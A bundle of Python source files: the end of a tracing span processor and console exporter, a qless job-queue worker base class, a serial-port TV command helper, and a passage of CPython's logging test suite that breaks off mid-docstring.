logger.warning("Already shutdown, ignoring call to force_flush().")
return True
with self.condition:
flush_request = self._get_or_create_flush_request()
# signal the worker thread to flush and wait for it to finish
self.condition.notify_all()
# wait for token to be processed
ret = flush_request.event.wait(timeout_millis / 1e3)
if not ret:
logger.warning("Timeout was exceeded in force_flush().")
return ret
def shutdown(self) -> None:
# signal the worker thread to finish and then wait for it
self.done = True
with self.condition:
self.condition.notify_all()
self.worker_thread.join()
self.span_exporter.shutdown()
class ConsoleSpanExporter(SpanExporter):
"""Implementation of :class:`SpanExporter` that prints spans to the
console.
This class can be used for diagnostic purposes. It prints the exported
spans to the console STDOUT.
"""
def __init__(
self,
out: typing.IO = sys.stdout,
formatter: typing.Callable[[Span], str] = lambda span: span.to_json()
+ os.linesep,
):
self.out = out
self.formatter = formatter
def export(self, spans: typing.Sequence[Span]) -> SpanExportResult:
for span in spans:
self.out.write(self.formatter(span))
self.out.flush()
return SpanExportResult.SUCCESS
|
__init__.py
|
#! /usr/bin/env python
'''Our base worker'''
from __future__ import print_function
import os
import code
import signal
import shutil
import sys
import traceback
import threading
from contextlib import contextmanager
from six import string_types
from six.moves import zip_longest
# Internal imports
from qless.listener import Listener
from qless import logger, exceptions
# Try to use the fast json parser
try:
import simplejson as json
except ImportError: # pragma: no cover
import json
# Setting the process title
try:
from setproctitle import setproctitle, getproctitle
except ImportError: # pragma: no cover
def setproctitle(title):
pass
def getproctitle():
return ''
class Worker(object):
'''Worker. For doing work'''
@classmethod
def title(cls, message=None):
'''Set the title of the process'''
if message == None:
return getproctitle()
else:
setproctitle('qless-py-worker %s' % message)
logger.info(message)
@classmethod
def divide(cls, jobs, count):
'''Divide up the provided jobs into count evenly-sized groups'''
jobs = list(zip(*zip_longest(*[iter(jobs)] * count)))
# If we had no jobs to resume, then we get an empty list
jobs = jobs or [()] * count
for index in range(count):
# Filter out the items in jobs that are Nones
jobs[index] = [j for j in jobs[index] if j != None]
return jobs
@classmethod
def clean(cls, path):
'''Clean up all the files in a provided path'''
for pth in os.listdir(path):
pth = os.path.abspath(os.path.join(path, pth))
if os.path.isdir(pth):
logger.debug('Removing directory %s' % pth)
shutil.rmtree(pth)
else:
logger.debug('Removing file %s' % pth)
os.remove(pth)
@classmethod
@contextmanager
def sandbox(cls, path):
'''Ensures path exists before yielding, cleans up after'''
# Ensure the path exists and is clean
try:
os.makedirs(path)
logger.debug('Making %s' % path)
except OSError:
if not os.path.isdir(path):
raise
finally:
cls.clean(path)
# Then yield, but make sure to clean up the directory afterwards
try:
yield
finally:
cls.clean(path)
def __init__(self, queues, client, **kwargs):
self.client = client
# This should accept either queue objects, or string queue names
self.queues = []
for queue in queues:
if isinstance(queue, string_types):
self.queues.append(self.client.queues[queue])
else:
self.queues.append(queue)
# Save our kwargs, since a common pattern to instantiate subworkers
self.kwargs = kwargs
# Check for any jobs that we should resume. If 'resume' is the actual
# value 'True', we should find all the resumable jobs we can. Otherwise,
# we should interpret it as a list of jobs already
self.resume = kwargs.get('resume') or []
if self.resume == True:
self.resume = self.resumable()
# How frequently we should poll for work
self.interval = kwargs.get('interval', 60)
# To mark whether or not we should shutdown after work is done
self.shutdown = False
def resumable(self):
'''Find all the jobs that we'd previously been working on'''
# First, find the jids of all the jobs registered to this client.
# Then, get the corresponding job objects
jids = self.client.workers[self.client.worker_name]['jobs']
jobs = self.client.jobs.get(*jids)
# We'll filter out all the jobs that aren't in any of the queues
# we're working on.
queue_names = set([queue.name for queue in self.queues])
return [job for job in jobs if job.queue_name in queue_names]
def jobs(self):
'''Generator for all the jobs'''
# If we should resume work, then we should hand those out first,
# assuming we can still heartbeat them
for job in self.resume:
try:
if job.heartbeat():
yield job
except exceptions.LostLockException:
logger.exception('Cannot resume %s' % job.jid)
while True:
seen = False
for queue in self.queues:
job = queue.pop()
if job:
seen = True
yield job
if not seen:
yield None
@contextmanager
def listener(self):
'''Listen for pubsub messages relevant to this worker in a thread'''
channels = ['ql:w:' + self.client.worker_name]
listener = Listener(self.client.redis, channels)
thread = threading.Thread(target=self.listen, args=(listener,))
thread.start()
try:
yield
finally:
listener.unlisten()
thread.join()
def listen(self, listener):
'''Listen for events that affect our ownership of a job'''
for message in listener.listen():
try:
data = json.loads(message['data'])
if data['event'] in ('canceled', 'lock_lost', 'put'):
self.kill(data['jid'])
except:
logger.exception('Pubsub error')
def kill(self, jid):
'''Stop processing the provided jid'''
raise NotImplementedError('Derived classes must override "kill"')
def signals(self, signals=('QUIT', 'USR1', 'USR2')):
'''Register our signal handler'''
for sig in signals:
signal.signal(getattr(signal, 'SIG' + sig), self.handler)
def stop(self):
'''Mark this for shutdown'''
self.shutdown = True
# Unfortunately, for most of this, it's not really practical to unit test
def handler(self, signum, frame): # pragma: no cover
'''Signal handler for this process'''
if signum == signal.SIGQUIT:
# QUIT - Finish processing, but don't do any more work after that
self.stop()
elif signum == signal.SIGUSR1:
# USR1 - Print the backtrace
message = ''.join(traceback.format_stack(frame))
message = 'Signaled traceback for %s:\n%s' % (os.getpid(), message)
print(message, file=sys.stderr)
logger.warn(message)
elif signum == signal.SIGUSR2:
# USR2 - Enter a debugger
# Much thanks to http://stackoverflow.com/questions/132058
data = {'_frame': frame} # Allow access to frame object.
data.update(frame.f_globals) # Unless shadowed by global
data.update(frame.f_locals)
# Build up a message with a traceback
message = ''.join(traceback.format_stack(frame))
message = 'Traceback:\n%s' % message
code.InteractiveConsole(data).interact(message)
|
tv_serial.py
|
import time, serial, threading
class TvSerial:
@staticmethod
def handler(signum, frame):
raise Exception("Serial connection timeout")
@staticmethod
def writeCommandAsync(command):
thread = threading.Thread(target=TvSerial.writeCommand, args=(command,))
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
return "This is fine ¯\_(ツ)_/¯"
@staticmethod
def writeCommand(command):
print("Will execute: " + command)
try:
# configure the serial connections (the parameters differs on the device you are connecting to)
ser = serial.Serial(port='/dev/ttyUSB0', baudrate=9600, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS)
ser.xonxoff = False
ser.rtscts = False
ser.dsrdtr = False
# prepare command
serialcmd = command + '\r\n'
# execute command
ser.write(serialcmd.encode())
out = ''
while out != 'WAIT' and out != 'OK' and out != 'ERR' and out != "0" and out != "1":
# wait for answer
while ser.inWaiting() == 0:
time.sleep(0.5)
# read answers
while ser.inWaiting() > 0:
char = ser.read(1).decode('utf-8')
if char != "\n" and char != "\r":
out += char
if out == "WAIT":
out = ""
except Exception:
return "ERROR"
return out
|
test_logging.py
|
# Copyright 2001-2022 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2022 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import copy
import datetime
import pathlib
import pickle
import io
import itertools
import gc
import json
import os
import queue
import random
import re
import shutil
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support.logging_helper import TestHandler
import textwrap
import threading
import asyncio
import time
import unittest
import warnings
import weakref
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
asyncore = warnings_helper.import_deprecated('asyncore')
smtpd = warnings_helper.import_deprecated('smtpd')
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = threading_helper.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
threading_helper.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_handler_filter_replaces_record(self):
def replace_message(record: logging.LogRecord):
record = copy.copy(record)
record.msg = "new message!"
return record
# Set up a logging hierarchy such that "child" and it's handler
# (and thus `replace_message()`) always get called before
# propagating up to "parent".
# Then we can confirm that `replace_message()` was able to
# replace the log record without having a side effect on
# other loggers or handlers.
parent = logging.getLogger("parent")
child = logging.getLogger("parent.child")
stream_1 = io.StringIO()
stream_2 = io.StringIO()
handler_1 = logging.StreamHandler(stream_1)
handler_2 = logging.StreamHandler(stream_2)
handler_2.addFilter(replace_message)
parent.addHandler(handler_1)
child.addHandler(handler_2)
child.info("original message")
handler_1.flush()
handler_2.flush()
self.assertEqual(stream_1.getvalue(), "original message\n")
self.assertEqual(stream_2.getvalue(), "new message!\n")
def test_logging_filter_replaces_record(self):
records = set()
class RecordingFilter(logging.Filter):
def filter(self, record: logging.LogRecord):
records.add(id(record))
return copy.copy(record)
logger = logging.getLogger("logger")
logger.setLevel(logging.INFO)
logger.addFilter(RecordingFilter())
logger.addFilter(RecordingFilter())
logger.info("msg")
self.assertEqual(2, len(records))
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
def make_temp_file(*args, **kwargs):
fd, fn = tempfile.mkstemp(*args, **kwargs)
os.close(fd)
return fn
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fn = make_temp_file()
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, encoding='utf-8', delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fn = make_temp_file()
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args, encoding="utf-8")
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipIf(
support.is_emscripten, "Emscripten cannot fstat unlinked files."
)
@threading_helper.requires_working_threading()
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fn = make_temp_file('.log', 'test_logging-3-')
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, encoding='utf-8', delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@support.requires_fork()
@threading_helper.requires_working_threading()
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt', encoding='utf-8'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0:
# Child process
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else:
# Parent process
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
support.wait_process(pid, exitcode=0)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self._quit = False
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
